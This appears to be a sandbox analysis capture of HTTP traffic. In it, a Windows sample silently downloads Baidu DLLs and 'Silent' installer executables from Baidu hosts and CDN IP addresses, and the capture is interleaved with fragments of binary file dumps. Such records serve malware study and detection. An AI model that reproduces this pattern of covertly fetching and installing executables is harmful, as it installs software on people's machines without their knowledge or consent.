HTTP/1.0 206 Partial Content

Expires: Sun, 27 Apr 2014 09:17:59 GMT

Date: Fri, 28 Mar 2014 09:17:59 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Thu, 27 Mar 2014 06:30:30 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 589824-1176519/1176520

Content-Length: 586696

Age: 1193267

Via: 1.0 hncd45:8104 (Cdn Cache Server V2.0), 1.0 jxjj51:8888 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="BDMNet.dll"
.......P.....;.Yt..............3.;.t..u.W.u..u.....t 9u.VVu.VV...u..u.
j.WV.u.........W.....Y.....u..u..u..u........e._^[.M.3...{....U......u
..M..S....u..E..u..u..u..u.P.........}..t..M..ap...U..QQ.E.V.u..E..E.W
V.E.........;.Yu.................J.u..M.Q.u.P......;..E.u...|.....t.P.
....Y...........x.........D0.. ..E..U._^..j.hxq...........u..u..E....u
..{.... ..`..................3.;.|.;.dx..r!.Q....8.7.........WWWWW.7y.
...............x..............L1....u&......8...........WWWWW..x......
.....[P.....Y.}....D0..t..u..u..u..u..........E..U....................
8.M...M...E...........E..U..].....u..(...Y..D$....u..c.........3..V3.;
.|.;.dx..r..F...VVVVV.......Fx.....3.^.............x.......D....@^....
.....3.9..m........U.....SV.u.3.;.W.}.u.;.v..E.;.t...3....E.;.t.......
...v......j.^SSSSS.0..w........R.u..M.......E.9X.......f.E.f=..v6;.t.;
.v.WSV.........q.....*....f...8]...t..M..ap._^[..;.t.;.w(.F...j"^SSSSS
.0.Gw.....8].t..E..`p..u......E.;.t.......8]...0....E..`p..$....M.QSWV
j..M.QS.]..p.......;.t.9]...b....M.;.t.......|.....z..H...;...k...;...
c...WSV.........S...j..t$..t$..t$..t$..........j.h.q........e..f.(..E.
.....#[email protected]..
E..E.S.X..5.. .P..Z .t.Q.3....E..]..U..M.........U..E.[.E.....t..^....
[email protected].[[email protected]...
..Yt"V..E.....V.<..x...uE.....Y.....Y.....@$.tN.N.x......A....V..H.
.Y...u.f....#[email protected].
.E.....Yt.V..D.....Yt"V..D.....V.<..x....D.....Y.....Y.....@...
<<< skipped >>>

GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dlsw.baidu.com

Referer: hXXp://dlsw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.1 200 OK

Server: JSP2/1.0.26

Date: Fri, 11 Apr 2014 04:45:22 GMT

Content-Type: application/x-msdownload

Connection: close

Content-Length: 1207520

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length

Accept-Ranges: bytes

Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT

Expires: Sat, 12 Apr 2014 07:20:45 GMT

x-bs-version: A65F70E089635AE47A1E2AED4F13B889

ETag: 30cbc602ada7cdfb0346038c05996d84

x-bs-request-id: MTAuMjE1LjEzMi4yMzo4MDgwOjE1NjY4NjcxMTA6MDkvQXByLzIwMTQgMTU6MjA6NDUg

x-bs-meta-crc32: 2965621797

Content-MD5: 30cbc602ada7cdfb0346038c05996d84

x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......M......S...S
...S.Y.S...S.[.S...S.[.S...S...S...S.[.S!..S...S...S...S...S.[.Sd..S.[
.S...S.[.S...S...S...S.[.S...SRich...S........................PE..L...
.!.Q...........!.....P... ......u........`............................
...........................................j.......V..................
[email protected]..@............`
..t............................text....O.......P.................. ..`
.rdata..1....`.......`..............@[email protected][email protected]........
[email protected]...............................@[email protected]..............
[email protected]..................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>

GET /client/new_w1154/0403/BaiduAn_Setup_1.0.546.32_Sid_555555_Silent.exe HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=131072-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.53/dl1sw.baidu.com/client/new_w1154/0403/BaiduAn_Setup_1.0.546.32_Sid_555555_Silent.exe?wsiphost=local

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=884736-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 206 Partial Content

Expires: Sun, 27 Apr 2014 09:18:23 GMT

Date: Fri, 28 Mar 2014 09:18:23 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Thu, 27 Mar 2014 06:30:30 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 884736-1176519/1176520

Content-Length: 291784

Age: 1193230

Via: 1.0 hncd45:8104 (Cdn Cache Server V2.0), 1.0 jxjj52:8888 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="BDMNet.dll"
 .......Unknown error...Success.No match....Invalid regular expression
..Invalid collation character.....Invalid character class name, collat
ing name, or character range....Invalid or unterminated escape sequenc
e.....Invalid back reference: specified capturing group does not exist
....Unmatched [ or [^ in character class declaration....Unmatched mark
ing parenthesis ( or \(...Unmatched quantified repeat operator { or \{
....Invalid content of repeat range.....Invalid range end in character
 class....Out of memory.......Invalid preceding regular expression pri
or to repetition operator...Premature end of regular expression.Regula
r expression is too large.....Unmatched ) or \)...Empty regular expres
sion........The complexity of matching the regular expression exceeded
 predefined bounds.  Try refactoring the regular expression to make ea
ch choice made by the state machine unambiguous.  This exception is th
rown to prevent "eternal" matches that take an indefinite period time 
to locate...Ran out of stack space trying to match the regular express
ion...Invalid or unterminated Perl (?...) sequence....Visual C   CRT: 
Not enough memory to complete call to strerror..s...........Illegal by
te sequence...Directory not empty.Function not implemented....No locks
 available..Filename too long...Resource deadlock avoided...Result too
 large....Domain error....Broken pipe.Too many links..Read-only file s
ystem...Invalid seek....No space left on device.File too large..Inappr
opriate I/O control operation.Too many open files.Too many open fi
<<< skipped >>>

GET /client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=7864320-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.55/dl1sw.baidu.com/client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe?wsiphost=local

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=131072-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=131072-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.51/dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local

GET /dl1sw.baidu.com/client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe?wsiphost=local HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: 117.21.189.55

Range: bytes=8388608-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 206 Partial Content

Expires: Sun, 11 May 2014 04:40:07 GMT

Date: Fri, 11 Apr 2014 04:40:07 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Tue, 08 Apr 2014 22:03:37 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 8388608-30451943/30451944

Content-Length: 22063336

Age: 345

Via: 1.0 fjqz158:80 (Cdn Cache Server V2.0), 1.0 jxjj55:10001 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe"
.A...^:xt...3>%)..~68.......(.>Uj..%.!....>...!r.T.@.:D.g.V..
..#W...6..4...4.W..:...Q....}J..R.#..&...v...|....3[...Y......j.}D.X.,
..9c..h%..sR..I......U.....h:,.......m..?.*.H.....LZ(..w.../...G#.....
.L..Zo.....^.K!...z....T........T.?]3.....>.~....#E<.....?A...*g
...m4...|......k5.v.WS..?...._F..a...........$...%......R...i..&......
.*.R..iQ.K..>.....s....K.U........S.7[.h.....{.<._.....-T....gT.
.e.e.m,..'.k...;....(._FxR.3.5..n.......'..,.v........M.........<U.
x.3.I....T....k..h{]g..... l.......a.._Td......W.z4t...J^O.......#...U
.{......Q....%m!....JYz...W..h;[email protected]..|K..!,.......@"..Pc.....2.OS
........R.vr....kJe..f....j&.G.#xW.m4...[..1HZ)a.0...dK`...@..|"i7#.w.
0W.A.....sx........ .L..AEv.Z7.....7T~.......t#.EH.x:......x..sU .....
.m..S.7a..N>.mf-....3..w.X..&...x.^#z.S.F.......u...r.(v.|.'j. ...[
S.]...D..a.....Y...y.=..."[email protected]!...0......i)........
.m..:..:|*.V.Ie..<......c...\...T9#.....C.....G..-#-.......4.P.#jW.
6..*..L..l...R....f..W*.......L..`$...4i....Q.y.\........a......U.....
"v...EX...2CI...9...|f...b..Z.......v.u....R.h.#.E....H..!...HYR59h.h.
.V.0.w.^..aJ...a.......h..9.".'.hm.N..D....".2\.HK).L..qwJspq$.A.....{
...............l.?.l....>.....eE.....H.}..l..J.m...1G...'.".....". 
......C\..`x..i..dDxw?$.a..,..-.v5...9........W..h.<..S.?...B.yN:.3
[email protected].".@[email protected].....}.....c.x#...X...........<...`^~.E..!.
% .FF._....T[$=.D.;....V..TI.B.......gA.B...j..Ien9H .*O..}....T...9n.
.-..........z..[.3.C.\_ ..!^.._.rP..(..\^.....:!..)5..].'[..-<.
<<< skipped >>>

GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dlsw.baidu.com

Range: bytes=131072-

Referer: hXXp://dlsw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.1 206 Partial Content

Server: JSP2/1.0.26

Date: Fri, 11 Apr 2014 04:45:24 GMT

Content-Type: application/x-msdownload

Connection: close

Content-Length: 1076448

Content-Range: bytes 131072-1207519/1207520

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length

Accept-Ranges: bytes

Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT

Expires: Sat, 12 Apr 2014 07:20:45 GMT

x-bs-version: A65F70E089635AE47A1E2AED4F13B889

ETag: 30cbc602ada7cdfb0346038c05996d84

x-bs-request-id: MTAuMjE1LjEzMi4yMzo4MDgwOjE1NjY4NjcxMTA6MDkvQXByLzIwMTQgMTU6MjA6NDUg

x-bs-meta-crc32: 2965621797

Content-MD5: 30cbc602ada7cdfb0346038c05996d84

x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
..~..F....^..E...........E..1n....u...-..Y.U.....SVW3.9}.t$9}.t..u.;.u
...<..WWWWW.......l......3._^[...M.;.t....3..u.9E.w..}...}.f.F....M
..}...t..F..E....E..............N.......t/.F...t(......;...r...W.u..6.
M...)~..>... ..}..O;].rO..t.V.b.....Yu}.}....t.3....u. .W.u.V.V...Y
P...........ta;...w....M. .;.rP.}..).E....VP.f......YYt).E..F.K...E...
.E.........A....E.......N. .. .3..u.......N. .E...j.hh....vl..3.9u.t)9
u.t$3.9u....;.u .7;........VVVVV........3...l....u... ..Y.u..u..u..u..
[email protected]... ..Y.j.j..t$...........t$.j.j..t$..
..................j.j..t$...........t$.j.j..t$..B........D$...V...F..u
c..I...F..Hl...Hh.N...;.P~..t...l}...Hpu..n......F.;.....t..F...l}...H
[email protected][email protected]...^....y..t..A..`p.....U.....V
W.u..M..Z....E..u.3.;.t..0;.u,..9..WWWWW...............}..t..E..`p.3..
....9}.t..}..|..}.$...M.S...}..~........~..E.P...j.P.~....M...........
.......B.....t...G....-u..M...... u...G.E.....I........@.....$..7.....
u*..0t..E......4..<xt.<Xt..E......!.E..........u...0u...<xt.&
lt;Xu.G..G.........3..u.......N...t......0..f....t1....a......w... ...
;M.s..M..9E.r'u.;.v!.M...}..u#.E.O..u .}..t..}..e...\.]...]....]...G..
.......u...u>...t..}.....w...u,9u.v'.-8...E...."...t..M.....E.$....
......E..E...t..8.E..t..]..}..t..E..`p..E....E...t..0.}..t..E..`p.3.[_
^..U..3.9.$...P.u..u..u.u.hX~....P........].j..t$..t$..t$..t$ ........
.U...=$....j..u..u..u.u.hX~....j..l......].j..t$..t$..t$..t$ .P.......
U....(SV.u..M.......u.3.;.u(. 7..SSSSS..............8].t..E..`p...
<<< skipped >>>

GET /client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=7733248-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.55/dl1sw.baidu.com/client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe?wsiphost=local

GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dlsw.baidu.com

Range: bytes=917504-

Referer: hXXp://dlsw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.1 206 Partial Content

Server: JSP2/1.0.26

Date: Fri, 11 Apr 2014 04:45:24 GMT

Content-Type: application/x-msdownload

Connection: close

Content-Length: 290016

Content-Range: bytes 917504-1207519/1207520

Access-Control-Allow-Origin: *

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length

Accept-Ranges: bytes

Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT

Expires: Sat, 12 Apr 2014 07:20:45 GMT

x-bs-version: A65F70E089635AE47A1E2AED4F13B889

ETag: 30cbc602ada7cdfb0346038c05996d84

x-bs-request-id: MTAuMjE1LjEzMi4yMzo4MDgwOjE1NjY4NjcxMTA6MDkvQXByLzIwMTQgMTU6MjA6NDUg

x-bs-meta-crc32: 2965621797

Content-MD5: 30cbc602ada7cdfb0346038c05996d84

x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
$,.....$..........L$ .`......T$..U...;.u...G....>..F......f=l.u..D$
dPQj.......`...5f=f.u3.T$TRQ......`...D$\P.L$XQ...`...T$dR.D$`P...`...
L$d........0.........P....$.<......h......$....Rf..f....#.RQ3.f....
.Qh.......`..........h......$....Rf..f....#.f..RQ........Ph.......`...
P...h......$....Rf..f....#.f..RQ........P..f..f..h......$....P..#.RQj.
h.......`....u.f..$......$.....D$.3.9t$ t-.t$ ...P....I........u.j.j. 
.PVj.j....`..... .D$...t....N..d$.f.....f..u. .....$.....tE.D$..3. .;.
}.....;.$....| ..$.........x...?P..$....P......p.....$.....L$.;...$...
.~m..t(;...}c....j.h.G..........9......;|$.|..A..$....3.9.$....... ...
 .;.~...;.}..d$...$......f..j ....;.|..l$..........D$...tU..t...VP....
.................$.....u...$.... .;.........6RP..$........iR.)........
....|$ .........t[.D6.P........|$ .T$,.N.Q.L$(..$....................V
W................$........tLW.........A..$.....u...$.... .;...r.....$.
......V.R.T$,..i.L$$._.........l$..|$.........|$.....$.....t2;........
.$........j.h.G.................;.|..b.....$....3.9.$....... ... .;.~.
..;...;.....$......f..j ....;.|......f=}.u...C....f=}...$..........f=.
.......f=..w|..t"....j.S.................$...........u....;.~0..f..i..
......B.;.~..........$......RV............f..f..i..f.K.......f..h.e..t
.....j.S.................$.....S..u....;.~...f..j.7....B.;.~..........
$......RV......H.....f..f..i........$.....l$...$.......f..........$...
..........$....;...$......................$.......L?.QR...............
.i..$.....t$.....$.....\$...r .Q...........q..t.W............_..$.
<<< skipped >>>

GET /dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: 117.21.189.53

Range: bytes=786432-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

GET /dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: 117.21.189.53

Range: bytes=786432-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 206 Partial Content

Expires: Sun, 27 Apr 2014 09:18:23 GMT

Date: Fri, 28 Mar 2014 09:18:23 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Thu, 27 Mar 2014 06:30:30 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 786432-1176519/1176520

Content-Length: 390088

Age: 1193233

Via: 1.0 hncd45:8104 (Cdn Cache Server V2.0), 1.0 jxjj53:8888 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="BDMNet.dll"
HTTP/1.0 206 Partial Content..Expires: Sun, 27 Apr 2014 09:18:23 GMT..
Date: Fri, 28 Mar 2014 09:18:23 GMT..Server: nginx..Content-Type: appl
ication/octet-stream..Last-Modified: Thu, 27 Mar 2014 06:30:30 GMT..Ca
che-Control: max-age=2592000..Accept-Ranges: bytes..Content-Range: byt
es 786432-1176519/1176520..Content-Length: 390088..Age: 1193233..Via: 
1.0 hncd45:8104 (Cdn Cache Server V2.0), 1.0 jxjj53:8888 (Cdn Cache Se
rver V2.0)..Connection: keep-alive..Content-Disposition: attachment;fi
lename="BDMNet.dll"..HTTP/1.0 206 Partial Content..Expires: Sun, 27 Ap
r 2014 09:18:23 GMT..Date: Fri, 28 Mar 2014 09:18:23 GMT..Server: ngin
x..Content-Type: application/octet-stream..Last-Modified: Thu, 27 Mar 
2014 06:30:30 GMT..Cache-Control: max-age=2592000..Accept-Ranges: byte
s..Content-Range: bytes 786432-1176519/1176520..Content-Length: 390088
..Age: 1193233..Via: 1.0 hncd45:8104 (Cdn Cache Server V2.0), 1.0 jxjj
53:8888 (Cdn Cache Server V2.0)..Connection: keep-alive..Content-Dispo
sition: attachment;filename="BDMNet.dll"..
<<< skipped >>>